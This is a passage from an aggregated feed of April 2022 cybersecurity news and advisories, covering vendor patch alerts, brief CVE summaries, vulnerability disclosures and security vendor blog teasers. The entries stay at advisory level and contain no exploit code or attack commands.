Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
UK joins international partners to issue advice on latest Russian cyber threat
2022-04-20T15:23:08Z | 1650468188

An overview of Russian cyber threats to critical infrastructure and mitigation guidance for all organisations.

https://www.ncsc.gov.uk/news/uk-joins-international-partners-to-issue-advice-on-latest-russian-cyber-threat-
Amarna: Static analysis for Cairo programs
2022-04-20T11:00:04Z | 1650452404

We are open-sourcing Amarna, our new static analyzer and linter for the Cairo programming language. Cairo is a programming language powering several trading exchanges with millions of dollars in assets (such as dYdX, driven by StarkWare) and is the programming language for StarkNet contracts. But, not unlike other languages, it has its […]

https://blog.trailofbits.com/2022/04/20/amarna-static-analysis-for-cairo-programs/
High Threat Security Alert (A22-04-20): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2022)
2022-04-20T04:00:00Z | 1650427200

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
How to Protect from Ransomware with SASE
2022-04-19T06:00:21Z | 1650348021

With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of... The post How to Protect from Ransomware with SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-protect-from-ransomware-with-sase/
High Threat Security Alert (A22-04-17): Vulnerability in Google Chrome
2022-04-19T04:00:00Z | 1650340800

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-04-18): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-04-19T04:00:00Z | 1650340800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-19): Vulnerability in VMware Products
2022-04-19T04:00:00Z | 1650340800

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-43990
2022-04-19T00:00:00Z | 1650326400

CWE-611: IMPROPER RESTRICTION OF XML EXTERNAL ENTITY REFERENCE The affected product is vulnerable to a network-based attack by threat actors supplying a crafted, malicious XML payload designed to trigger an external entity reference call.

https://claroty.com/team82/disclosure-dashboard/cve-2021-43990
CVE-2021-43988
2022-04-19T00:00:00Z | 1650326400

CWE 22: IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') The affected product is vulnerable to a network-based attack by threat actors utilizing crafted naming conventions of files to gain unauthorized access rights.

https://claroty.com/team82/disclosure-dashboard/cve-2021-43988
CVE-2021-43986
2022-04-19T00:00:00Z | 1650326400

CWE-284 : IMPROPER ACCESS CONTROL The setup program for the affected product configures its files and folders with full access, which may allow unauthorized users permission to replace original binaries and achieve privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2021-43986
CVE-2021-43933
2022-04-19T00:00:00Z | 1650326400

CWE-400 : UNCONTROLLED RESOURCE CONSUMPTION The affected product is vulnerable to a network-based attack by threat actors sending unimpeded requests to the receiving server, which could cause a denial-of-service condition due to lack of heap memory resources.

https://claroty.com/team82/disclosure-dashboard/cve-2021-43933
CVE-2021-38483
2022-04-19T00:00:00Z | 1650326400

CWE-732: INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE The affected product is vulnerable to misconfigured binaries, allowing users on the target PC with SYSTEM level privileges access to overwrite the binary and modify files to gain privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2021-3848
The Frozen Heart vulnerability in PlonK
2022-04-18T11:00:01Z | 1650279601

In part 1 of this blog post, we disclosed critical vulnerabilities that break the soundness of multiple implementations of zero-knowledge proof systems. This class of vulnerability, which we dubbed Frozen Heart, is caused by insecure implementations of the Fiat-Shamir transformation that allow malicious users to forge proofs for random statements. In part […]

https://blog.trailofbits.com/2022/04/18/the-frozen-heart-vulnerability-in-plonk/
Já se encontra disponível o Referencial de Competências em Cibersegurança do CNCS
2022-04-18T00:00:00Z | 1650240000

O Centro Nacional de Cibersegurança (CNCS) criou um Referencial de Competências em Cibersegurança como instrumento útil para a formação e a contração de profissionais nesta área.Este Referencial apresenta um conjunto de competências e conhecimentos de referência necessários para o cumprimento de funções e tarefas em cibersegurança. Não devendo ser lido de forma estanque, a documentação deste Referencial pretende servir de suporte ao desenvolvimento do setor da cibersegurança nas suas diversas áreas, contribuindo, também, para a definição e formulação de políticas públicas neste domínio.Consulte a documentação aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135660/ja-se-encontra-disponivel-o-referencial-de-competencias-em-ciberseguranca-do-cncs
Demystify Supply Chain Emissions with Akamai?s New Carbon Calculator
2022-04-15T13:00:00Z | 1650027600

Oftentimes, organizations view supply chains as an extension of their own business and require suppliers to adhere to codes of conduct, efficiency standards, and more. Today, this has expanded to environmental sustainability goals as well. Companies understand that the environmental impact of their economic activity is not limited to their direct operations. It?s integral to look beyond direct emissions and risks to the entire value chain.

https://www.akamai.com/blog/culture/akamai-carbon-calculator-supply-chain-emissions
The Frozen Heart vulnerability in Bulletproofs
2022-04-15T11:00:52Z | 1650020452

In part 1 of this series, we disclosed critical vulnerabilities that break the soundness of multiple implementations of zero-knowledge proof systems. This class of vulnerability, which we dubbed Frozen Heart, is caused by insecure implementations of the Fiat-Shamir transformation that allow malicious users to forge proofs for random statements. In part 2, […]

https://blog.trailofbits.com/2022/04/15/the-frozen-heart-vulnerability-in-bulletproofs/
Undetected Attacks on Anti-Malware Agents Using DNS Spoofing
2022-04-14T13:00:00Z | 1649941200

Although we?ve made significant progress as a community in this regard, there are still instances in which the outcome of DNS spoofing attacks can go undetected. In this article, we describe a DNS spoofing attack that goes unnoticed by users.

https://www.akamai.com/blog/security/attacks-anti-malware-dns-spoofing
Lipstick on a Pig: When a Single-Pane-of-Glass Hides a Bad SASE Architecture
2022-04-14T12:20:56Z | 1649938856

The Secure Access Service Edge (SASE) is a unique innovation. It doesn’t focus on new cutting-edge features such as addressing emerging threats or improving application performance. Rather, it focuses on making networking and security infrastructure easier to deploy, maintain, manage, and adapt to changing business and technical requirements. This new paradigm is threatening legacy point... The post Lipstick on a Pig: When a Single-Pane-of-Glass Hides a Bad SASE Architecture appeared first on Cato Networks.

https://www.catonetworks.com/blog/lipstick-on-a-pig-when-a-single-pane-of-glass-hides-a-bad-sase-architecture/
The Frozen Heart vulnerability in Girault’s proof of knowledge
2022-04-14T11:00:32Z | 1649934032

In part 1 of this series, we disclosed critical vulnerabilities that break the soundness of multiple implementations of zero-knowledge proof systems. This class of vulnerability, which we dubbed Frozen Heart, is caused by insecure implementations of the Fiat-Shamir transformation that allow malicious users to forge proofs for random statements. The vulnerability is […]

https://blog.trailofbits.com/2022/04/14/the-frozen-heart-vulnerability-in-giraults-proof-of-knowledge/
Interruption in some of the electronic forms Saturday 16 April 6:00-12:00 AM
2022-04-14T08:53:24Z | 1649926404

Interruption in some of the electronic forms Saturday 16 April 6:00-12:00 AM

https://www.traficom.fi/en/news/interruption-some-electronic-forms-saturday-16-april-600-1200-am
Interruption in some of the electronic forms Saturday 16 April 6:00-12:00 AM
2022-04-14T08:53:24Z | 1649926404

Interruption in some of the electronic forms Saturday 16 April 6:00-12:00 AM

https://www.traficom.fi/en/news/interruption-some-electronic-forms-saturday-16-april-600-1200-am
Security Alert (A22-04-16): Multiple Vulnerabilities in Cisco Products
2022-04-14T04:00:00Z | 1649908800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
ArduPilot APWeb cgi.c unescape memory corruption vulnerability
2022-04-14T00:00:00Z | 1649894400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1512
Picture-Perfect Gaming Experience for WorldMatch
2022-04-13T13:00:00Z | 1649854800

WorldMatch, a games and content provider for global markets, collaborates with some of the biggest international casinos. Headquartered in Italy and in operation since 2003, the gaming provider boasts a portfolio of more than 200 games, 160 slot machines with 70 game engines, 30 table games, and all types of video poker. We?re delighted that this innovative company has chosen to work with Akamai to deliver a picture-perfect experience for their customers via the services provider, Criticalcase.

https://www.akamai.com/blog/security/worldmatch-gaming
Coordinated disclosure of vulnerabilities affecting Girault, Bulletproofs, and PlonK
2022-04-13T11:00:00Z | 1649847600

Trail of Bits is publicly disclosing critical vulnerabilities that break the soundness of multiple implementations of zero-knowledge proof systems, including PlonK and Bulletproofs. These vulnerabilities are caused by insecure implementations of the Fiat-Shamir transformation that allow malicious users to forge proofs for random statements. We’ve dubbed this class of vulnerabilities Frozen Heart. […]

https://blog.trailofbits.com/2022/04/13/part-1-coordinated-disclosure-of-vulnerabilities-affecting-girault-bulletproofs-and-plonk/
Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
2022-04-13T09:15:00Z | 1649841300

Microsoft?s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 and CVE-2022-24528 (discovered by Yuki Chen with Cyber KunLun) CVE-2022-26809 (discovered by BugHunter010 with Kunlun)

https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
Bürokratt kutsub arendama riigi tehisintellekti tööampsudena
2022-04-13T07:00:00Z | 1649833200

Riigi Infosüsteemi Amet (RIA) kuulutas välja täiendava miljoni euro suuruse raamhanke riigi tehisintellekti Bürokrati teenuste arendamiseks. Hankele kvalifitseerumiseks piisab vaid pakkumuse esitamisest.

https://ria.ee/uudised/burokratt-kutsub-arendama-riigi-tehisintellekti-tooampsudena
RIA sulgeb oma aja ära elanud ISKE portaali
2022-04-13T06:00:00Z | 1649829600

Riigi infosüsteemi amet (RIA) suunab 12. aprillist ISKE portaali külastajad ümber Eesti Infoturbestandardi (E-ITS) värskele veebilehele eits.ria.ee. Muudatus on osa ISKE väljavahetamisest uue paindlikuma E-ITSi vastu.

https://ria.ee/uudised/ria-sulgeb-oma-aja-ara-elanud-iske-portaali
High Threat Security Alert (A22-04-13): Multiple Vulnerabilities in Microsoft Products (April 2022)
2022-04-13T04:00:00Z | 1649822400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-14): Vulnerability in Apache Struts
2022-04-13T04:00:00Z | 1649822400

Apache has released a security update to address a vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-15): Multiple Vulnerabilities in Adobe Reader/Acrobat
2022-04-13T04:00:00Z | 1649822400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Post-Auth Arbitrary File Read vulnerability Impacting End-Of-Life SRA Appliances and End-Of-Support SMA100 firmware versions
2022-04-13T00:15:43Z | 1649808943

NOTE: SonicWall PSIRT has continued to observe threat actors targeting EOL SRA devices (i.e., CVE-2021-20028), active exploitation of this vulnerability is likely in chained attacks leveraging CVE-2021-20028.Through SonicWall PSIRT Threat Intelligence gathering, SonicWall has become aware of a ‘Post Authentication Arbitrary File Read’ vulnerability impacting end-of-life Secure Remote Access (SRA) series products, specifically appliances running all 8.x or 9.0.0.5-19sv and earlier versions. And Secure Mobile Access (SMA) 100 series products running old firmware 9.0.0.9-26sv and earlier versions.In February 2021, SonicWall released SMA firmware 10.2.0.7 and 9.0.0.10 to fix a zero-day vulnerability, along with additional comprehensive code-strengthening. This strengthening proactively prevented this newly reported vulnerability in versions 9.0.0.10 and later.-   Organizations that previously upgraded to the 9.0.0.10 firmware or later are already protected against this newly reported issue and no action is required.-   Organizations with any 10.x versions are not impacted by this vulnerability as the vulnerable feature was deprecated in the 10.x release.-   Organizations running any firmware versions of 8.x or older than 9.0.0.10 or 10.2.0.7 should, per our earlier instructions, upgrade immediately. These older versions may potentially be exploited if not patched immediately.IMPORTANT: SMA 1000 series products are not affected by this vulnerability. CVE: CVE-2022-22279 Last updated: April 13, 2022, 12:15 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0006
Akamai Is a Leader in Bot Management ? What That Means for You
2022-04-12T15:00:00Z | 1649775600

Obviously we?re proud to be a leader. Bot management is a contact sport, where being great is a requirement if you want to stop the persistent adversarial bots. So it?s rewarding to be recognized for the work we?re doing keeping the bad bots away from our customers? digital businesses.

https://www.akamai.com/blog/news/leadership-bot-management
Markdown Menace: Discovering an LFI Vulnerability on a Blogging Platform
2022-04-12T13:00:00Z | 1649768400

Protecting sensitive information is a recurring and widely known concern in the security community. As researchers, we know all too well how information can be used maliciously (I mean, come on ? it?s our job). Considering the size of the threat vector that is LFI, it?s something that developers and security professionals alike need to be aware of.

https://www.akamai.com/blog/security/markdown-menace
Why Linode+Akamai Is Transformational for How Developers Use the Cloud
2022-04-12T13:00:00Z | 1649768400

Just three weeks have gone by since Akamai officially welcomed Linode into our fold, and I?m encouraged by the excitement that so many have expressed about the combination of our two companies since we announced the acquisition in February. In conversations with us, industry analysts use the word ?transformational? to sum up the potential impact of our merger on the marketplace.

https://www.akamai.com/blog/news/linode-akamai-transform-how-developers-use-the-cloud
The Value of Security Simplicity
2022-04-12T11:57:05Z | 1649764625

A Complex Landscape As time passes, technology and human innovation have advanced rapidly. This is not only in terms of available connectivity, bandwidth, and processing power but also in terms of the networking and security landscape as well. For every technological advancement in consumer and business productivity, IT systems, operations and security must also try... The post The Value of Security Simplicity appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-value-of-security-simplicity/
Uudsete e-teenuste vundamendi laob Nortal
2022-04-12T06:00:00Z | 1649743200

Eesti riigi eesmärk on pakkuda kodanikele mugavamaid ja lihtsamaid teenuseid, mis pärivad inimestelt vähem ja teevad nende eest rohkem. Just selliste teenuste vundamenti hakkab laduma Nortal, mis võitis riigi infosüsteemi ameti (RIA) raamhanke.

https://ria.ee/uudised/uudsete-e-teenuste-vundamendi-laob-nortal
Security Alert (A22-04-12): Multiple Vulnerabilities in Google Chrome
2022-04-12T04:00:00Z | 1649736000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-26507
2022-04-12T00:00:00Z | 1649721600

The vulnerabilities reported on XDemill and XMilI are triggered through the execution of a malicious script on the engineering workstation, or when loading a specially crafted project file into the engineering tool. The successful exploitation of these vulnerabilities may lead to code execution with elevated privileges on the engineering workstation. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2022-26507
CVE-2022-23450
2022-04-12T00:00:00Z | 1649721600

The affected system allows remote users to send maliciously crafted objects. Due to insecure deserialization of user-supplied content by the affected software, an unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted serialized object. This could allow the attacker to execute arbitrary code on the device with SYSTEM privileges.

https://claroty.com/team82/disclosure-dashboard/cve-2022-23450
CVE-2022-23449
2022-04-12T00:00:00Z | 1649721600

A DLL Hijacking vulnerability could allow a local attacker to execute code with elevated privileges by placing a malicious DLL in one of the directories on the DLL search path.

https://claroty.com/team82/disclosure-dashboard/cve-2022-23449
CVE-2022-23448
2022-04-12T00:00:00Z | 1649721600

Affected applications improperly assign permissions to critical directories and files used by the application processes. This could allow a local unprivileged attacker to achieve code execution with ADMINISTRATOR or even NT AUTHORITY/SYSTEM privileges.

https://claroty.com/team82/disclosure-dashboard/cve-2022-23448
CVE-2022-1264
2022-04-12T00:00:00Z | 1649721600

The affected product may allow an attacker with access to the Ignition web configuration to run arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-124
Olukord küberruumis – märts 2022
2022-04-11T08:00:00Z | 1649664000

Märtsis registreerisime 198 mõjuga intsidenti, mis on aasta keskmisel tasemel, kuid tõus võrreldes eelmise kuuga.

https://ria.ee/uudised/olukord-kuberruumis-marts-2022
Kriitilised turvanõrkused Java Spring raamistikus nõuavad tähelepanu
2022-04-08T06:00:00Z | 1649397600

Märtsi lõpus tuli avalikuks laialt kasutatud veebiraamistiku Java Springiga seotud nullpäeva turvanõrkus. Riigi infosüsteemi amet (RIA) soovitab organisatsioonidel kontrollida, kas turvanõrkused seavad ka nende süsteemid ohtu.

https://ria.ee/uudised/kriitilised-turvanorkused-java-spring-raamistikus-nouavad-tahelepanu
Security Alert (A22-04-11): Vulnerability in Microsoft Edge (Chromium-based)
2022-04-08T04:00:00Z | 1649390400

Microsoft released a security update to address the vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-22515
2022-04-08T00:00:00Z | 1649376000

The CODESYS Control runtime system enables embedded or PC-based devices to be a programmable industrial controller. Control programs can access local or remote IOs, communication interfaces such as serial ports or sockets, and local system functions such as the file system, the real-time clock and other OS functions. The control program could utilize this vulnerability to read and modify the configuration file(s) of the affected products via CAA File, SysFile, SysFileAsync, or other IEC code libraries for file access. Programming the controller is only possible, if the online user management is deactivated/not active or if the attacker has previously successfully authenticated himself at the controller.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22515
Inside Cato: How a Data Driven Approach Improves Client Identification in Enterprise Networks
2022-04-07T07:04:50Z | 1649315090

Identification of OS-level client types over IP networks has become crucial for network security vendors. With this information, security administrators can gain greater visibility into their networks, differentiate between legitimate human activity and suspicious bot activity, and identify potentially unwanted software. The process of identifying clients by their network traces is, however, very challenging. Most... The post Inside Cato: How a Data Driven Approach Improves Client Identification in Enterprise Networks appeared first on Cato Networks.

https://www.catonetworks.com/blog/inside-cato-how-a-data-driven-approach-improves-client-identification-in-enterprise-networks/
Shadow IT the Easy Way
2022-04-07T06:41:33Z | 1649313693

The post Shadow IT the Easy Way appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-conquering-shadow-it
High Threat Security Alert (A22-04-09): Multiple Vulnerabilities in VMware Products
2022-04-07T04:00:00Z | 1649304000

VMware has published security advisories to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-10): Multiple Vulnerabilities in Cisco Products
2022-04-07T04:00:00Z | 1649304000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)
2022-04-07T00:00:00Z | 1649289600

Porting part 2's ChakraCore exploit to Microsoft Edge while defeating ASLR, DEP, CFG, ACG, CIG, and other mitigations.

/type-confusion-part-3/
Security Alert (A22-04-06): Multiple Vulnerabilities in Android
2022-04-06T04:00:00Z | 1649217600

Google has released Android Security Bulletin April 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-07): Vulnerability in Google Chrome
2022-04-06T04:00:00Z | 1649217600

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-08): Multiple Vulnerabilities in Firefox
2022-04-06T04:00:00Z | 1649217600

Mozilla has published the advisories (MFSA2022-13 and MFSA2022-14) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Foi publicado o Boletim n.º 1/2022 do Observatório de Cibersegurança
2022-04-06T00:00:00Z | 1649203200

O Boletim n.º 1/2022, de abril, do Observatório de Cibersegurança do CNCS, analisa o problema da identificação dos agentes de ameaça no ciberespaço e as metodologias utilizadas para ultrapassar essa dificuldade. Esta edição apresenta ainda uma panorâmica sobre os tipos de agentes de ameaça mais comuns em Portugal nos últimos anos, de acordo com os Relatórios do Observatório de Cibersegurança.Como sempre, o Boletim é também uma oportunidade para partilhar documentos e notícias.Consulte o Boletim n.º 1/2022 aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135658/foi-publicado-o-boletim-n-12022-do-observatorio-de-ciberseguranca
Conti?s Hacker Manuals ? Read, Reviewed & Analyzed
2022-04-05T18:00:00Z | 1649181600

Conti is a notorious ransomware group that targets high-revenue organizations. They were first detected in 2020, and appear to be based in Russia. It is believed that the group is the successor to Ryuk ransomware group. According to Chainalysis, The ransomware group was the highest grossing of all ransomware groups in 2021, with an estimated revenue of at least 180 million dollars.

https://www.akamai.com/blog/security-research/conti-hacker-manual-reviewed
Can You Really Trust Zero Trust Network Access?
2022-04-05T12:16:29Z | 1649160989

Why Yes The global economy’s shift to hybrid work models is challenging enterprises to securely connect their work-from-anywhere employees. Supporting these highly distributed, dynamic, and diverse networks requires enterprises to be more flexible and accommodating, which results in remote access becoming an increasingly expanding attack surface. A crucial step in reducing this risk is transitioning... The post Can You Really Trust Zero Trust Network Access? appeared first on Cato Networks.

https://www.catonetworks.com/blog/can-you-really-trust-zero-trust-network-access/
Trendid ja tähelepanekud küberruumis – I kvartal 2022
2022-04-05T08:00:00Z | 1649145600

RIA loob iga kvartali kohta ülevaate, mis räägib perioodi tähtsamatest trendidest ja tähelepanekutest.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-i-kvartal-2022
CERT-EE väljatöötatud äpp kaitseb õngitsuste ja pahavara eest
2022-04-05T06:48:34Z | 1649141314

Riigi Infosüsteemi Ameti (RIA) intsidentide käsitlemise osakond (CERT-EE) lõi lahenduse, mis kaitseb nutiseadmeid pahatahtlike veebilinkide ja pahavara eest.

https://ria.ee/uudised/cert-ee-valjatootatud-app-kaitseb-ongitsuste-ja-pahavara-eest
RIA otsib uuele pääsuhaldussüsteemile IT-arendajat
2022-04-05T06:00:00Z | 1649138400

Riigi infosüsteemi amet (RIA) otsib IT-partnerit, kellega arendada keskne rollipõhine pääsuhaldussüsteemi platvorm. Keskkonnast saab abimees ettevõtetele ning muudab nende asjaajamise lihtsamaks ja vähem kulukaks.

https://ria.ee/uudised/ria-otsib-uuele-paasuhaldussusteemile-it-arendajat
High Threat Security Alert (A22-04-04): Vulnerability in VMware Products
2022-04-04T04:00:00Z | 1649044800

VMware has published a security advisory to address the vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-05): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-04-04T04:00:00Z | 1649044800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Spring Remote Code Execution: CVE-2022-22963 and CVE-2022-22965
2022-04-02T18:13:48Z | 1648923228

SonicWall PSIRT is tracking two critical vulnerabilities impacting the Spring Framework. This advisory is intended to address both. 1)CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring ExpressionIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.2)CVE-2022-22965: Remote code execution in Spring Framework via Data Binding on JDK9+A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. SonicWall Product (Appliance/Cloud/Virtual/OnPrem) Status Description Email Security- Hosted Email Security (HES)- On-Premise Email Security  Not Impacted Spring framework is not used in the Email Security appliance. NSM- NSM SaaS          - NSM On-Premise Not Impacted  NSM is not using the vulnerable Spring Framework components and is not impacted. WAF Not Impacted  Spring framework is not used in the WAF appliance. Gen5 Firewalls (EOS)- TZ100/W- TZ200/W- TZ210/W- NSA 220/W- NSA 250M/250M-W- NSA 2400/MX/3500/4500/5500- NSA E5500/6500/6500/8500/8510 Not Impacted Spring framework is not used in the Gen5 appliance. Gen6 Firewalls- TZ300/W; TZ350/W- TZ400/W- TZ500/W- TZ600- NSA 2600/2650/3600/3650/4600/4650/5600/5650/6600/6650- SM 9200/9400/9600/9800- NSa 9250/9450/9650- NSSP 12400/12800- NSV 10/25/50/100/200/400/800/1600 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted Spring framework is not used in the Gen6 appliance. Gen7 Firewalls- TZ270/W- TZ370/W- TZ470/W- TZ570/W- TZ670- NSA 2700/3700/4700/5700/6700- NSSP 10700/11700/13700/15700- NSV 270/470/870 (ESX, KVM, HYPER-V, AWS, Azure) Not Impacted Spring framework is not used in the Gen7 appliance. SonicWall Switch- SWS 12-8/12-8POE- SWS 12-10FPOE- SWS 14-24/14-24FPOE- SWS 14-48/14-48FPOE Not Impacted Spring framework is not used in the SonicWall Switch. SMA 100- SMA 200/210/400/410- SMA 500v (ESX, KVM, Hyper-V, AWS, Azure) Not Impacted Spring framework is not used in the SMA100 appliance. SMA 1000- SMA 6200/7200/6210/7210- SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure)- SRA EX 7000  Not Impacted SMA1000 is not using the vulnerable Spring Framework components and is not impacted.. MSW  Not Impacted Spring framework is not used in the MSW. Analyzer Not Impacted Spring framework is not used in the Analyzer. GMS Not Impacted Spring framework is not used in the GMS. Capture Client & Capture Client Portal Not Impacted Spring framework is not used in the Capture Client & Capture Client Portal. CAS Not Impacted Spring framework is not used in the CAS. Access Points  Not Impacted Spring framework is not used in the SonicWall Access Points. WNM Not Impacted Spring framework is not used in the WNM. Capture Security Appliance  Not Impacted Spring framework is not used in the appliance. WXA- WXA 2000/4000- Virtual: WXA 5000- Software: WXA 500, WXA 6000 Not Impacted Spring framework is not used in the appliance. CSCMA Not Impacted Spring framework is not used in the appliance. EPRS Not Impacted Spring framework is not used in the EPRS. Cloud Edge Not Impacted Spring framework is not used in the Cloud Edge. Analytics Not Impacted  Spring framework is not used in the Analytics. CVE: CVE-2022-22963, CVE-2022-22965 Last updated: April 2, 2022, 6:13 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005
Tundmatule lingile vajutades võib Facebooki kontost ilma jääda
2022-04-01T06:06:39Z | 1648793199

Riigi infosüsteemi amet (RIA) saab pidevalt teateid sotsiaalmeediakontode kaaperdamistest. Viimasel nädalal sai RIA kaks teadet uut tüüpi konto kaaperdamisest, kus Facebooki kasutaja konto võeti üle ühe vale klõpsuga.

https://ria.ee/uudised/tundmatule-lingile-vajutades-voib-facebooki-kontost-ilma-jaada
High Threat Security Alert (A22-04-01): Multiple Vulnerabilities in Spring Framework
2022-04-01T04:00:00Z | 1648785600

Spring has released a security advisory to address multiple remote code execution vulnerabilities in Spring Framework.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-04-02): Vulnerability in Apple iOS and iPadOS
2022-04-01T04:00:00Z | 1648785600

Apple has released iOS 15.4.1 and iPadOS 15.4.1 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-04-03): Vulnerability in Pulse Secure Products
2022-04-01T04:00:00Z | 1648785600

Pulse Secure has published a security advisory to address a vulnerability in Pulse Secure products.

https://www.govcert.gov.hk/en/alerts_detail.php
2022 Call for Nominations for the FIRST Board of Directors
2022-04-01T00:00:00Z | 1648771200

Each year, the FIRST membership elects five individuals to the FIRST board of directors.

https://www.first.org/newsroom/news/20220401
Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild
2022-03-31T19:30:00Z | 1648755000

Although Spring Cloud Functions are not as widespread as the Log4j library, and should provide a good separation from the hosting server, some draw the line between the two, due to the ease of exploitation over HTTP/s. This new vulnerability will definitely result in many threat actors launching campaigns for crypto-mining, ddos, ransomware, and as a golden ticket to break into organizations for the next years to come.

https://www.akamai.com/blog/security/spring-cloud-function
Mitigating Spring Core ?Spring4Shell? Zero-Day
2022-03-31T13:00:00Z | 1648731600

When Spring, the Java-based application, fell victim to cyberattacks, Akamai's Adaptive Security Engine detected zero-day attacks and protected customers against them.

https://www.akamai.com/blog/security/spring-core-spring4shell-zero-day
Cato Patches Vulnerabilities in Java Spring Framework in Record Time
2022-03-31T10:09:03Z | 1648721343

Two Remote Code Execution (RCE) vulnerabilities have been discovered in the Java Spring framework used in AWS serverless and many other Java applications. At least one of the vulnerabilities has been currently assigned a critical severity level and is already being targeted by threat actors. Within 20 hours of the disclosure, Cato Networks customers were... The post Cato Patches Vulnerabilities in Java Spring Framework in Record Time appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-patches-vulnerabilities-in-java-spring-framework-in-record-time/
Accusoft ImageGear parse_raster_data out-of-bounds write vulnerability
2022-03-31T00:00:00Z | 1648684800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1411
CVE-2022-1161
2022-03-31T00:00:00Z | 1648684800

An attacker with the ability to modify a user program may change user program code on some ControlLogix, CompactLogix, and GuardLogix Control systems. Studio 5000 Logix Designer writes user-readable program code to a separate location than the executed compiled code allowing an attacker to change one and not the other. Additionally, devices communicating over the unauthenticated version of EtherNet/IP may be vulnerable to attacks from custom clients exploiting CVE-2021-22681 . Read "The Old Switcheroo: Hiding Code on Rockwell Automation PLCs"

https://claroty.com/team82/disclosure-dashboard/cve-2022-1161
CVE-2022-1159
2022-03-31T00:00:00Z | 1648684800

Studio 5000 Logix Designer compiles the user program on the workstation. This compilation process prepares the Logix Designer application user program for download to a Logix controller. To successfully exploit this vulnerability, an attacker must first gain administrator access to the workstation running Studio 5000 Logix Designer. The attacker can then intercept the compilation process and inject code into the user program. The user may potentially be unaware that this modification has taken place.Read: "The Old Switcheroo: Hiding Code on Rockwell Automation PLCs"

https://claroty.com/team82/disclosure-dashboard/cve-2022-1159
Welcome to Edge Diagnostics
2022-03-30T13:00:00Z | 1648645200

